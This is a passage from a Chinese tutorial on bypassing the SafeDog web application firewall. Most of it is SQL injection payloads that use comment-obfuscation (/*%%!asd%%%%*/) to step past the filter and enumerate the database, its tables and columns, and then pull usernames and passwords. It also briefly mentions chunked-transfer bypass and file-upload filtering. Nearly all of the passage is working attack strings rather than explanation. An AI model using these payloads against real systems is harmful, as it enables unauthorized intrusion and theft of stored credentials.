方法二 分块传输
分块传输依然可以
1' union select 1,database() --+
获取数据库中的表 方法一
正常注入语句:
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+
根据前面的测试,这个绕过就很简单了,只需要将一个空格地方替换成/*%%!asd%%%%*/即可。
Payload:
1' union/*%%!asd%%%%*/select 1,group_concat(table_name) /*%%!asd%%%%*/from /*%%!asd%%%%*/information_schema.tables where table_schema=database(/*%%!asd%%%%*/) --+
方法二 分块传输
获取表中的字段名 方法一
正常注入语句:
1' union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ --+
绕过方法和获取表的操作无异:
1' union/*%%!asd%%%%*/select 1,group_concat(column_name) /*%%!asd%%%%*/from/*%%!asd%%%%*/information_schema.columns where table_name=’users’ --+
方法二 分块传输
获取数据 方法一
正常注入语句:
1' union select group_concat(user),group_concat(password) from users --+
绕过方法还是一样:
1' union/*%%!asd%%%%*/select group_concat(user),group_concat(password) /*%%!asd%%%%*/from/*%%!asd%%%%*/users --+
方法二 分块传输
文件上传
安全狗对文件上传的拦截是通过检测文件扩展名来实现的。只要解析结果在禁止上传的文件类型列表中,就会被拦截。